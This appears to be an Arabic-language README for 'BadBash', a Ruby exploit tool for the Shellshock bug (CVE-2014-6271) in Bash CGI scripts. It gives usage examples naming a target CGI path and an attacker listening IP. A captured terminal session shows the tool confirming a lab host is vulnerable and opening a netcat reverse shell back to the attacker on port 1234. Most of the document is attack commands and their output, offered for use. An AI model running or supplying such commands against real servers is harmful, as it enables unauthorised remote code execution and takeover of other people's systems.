
أداة CVE-2014-6271 RCE
BadBash هي أداة استغلال لثغرة CVE-2014-6271 من نوع RCE. الإصدار الأساسي يتحقق فقط من موقع HTTP CGI ولا يوفر سوى صدفة عكسية عبر netcat على المنفذ 1234.
المطوّر : Andy Yang الإصدار : 0.1.0 الرخصة : GPLv3
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - أداة RCE لثغرة CVE-2014-6271 بواسطة Andy Yang الإصدار الأساسي يتحقق فقط من موقع HTTP الإصدار الأساسي يوفر فقط صدفة عكسية عبر netcat على المنفذ 1234
مثال على الاستخدام:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path المسار الكامل لصفحة CGI
-d, --Destination IP عنوان IP الخاص بك الذي تستمع من خلاله إلى اتصال وارد
-h, --help عرض المساعدة
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] جارٍ التحقق مما إذا كان الهدف عرضةً للثغرة........
[Info] قد يستغرق هذا ما يصل إلى 10 ثوانٍ........
[Info] الهدف عرضة للثغرة!!!
[Info] يُرجى استخدام NC للاستماع على المنفذ 1234 للحصول على صدفة عكسية..........
[Info] جارٍ استغلال الثغرة لفتح صدفة عكسية للاتصال بـ 172.16.189.1:1234 عبر netcat ..........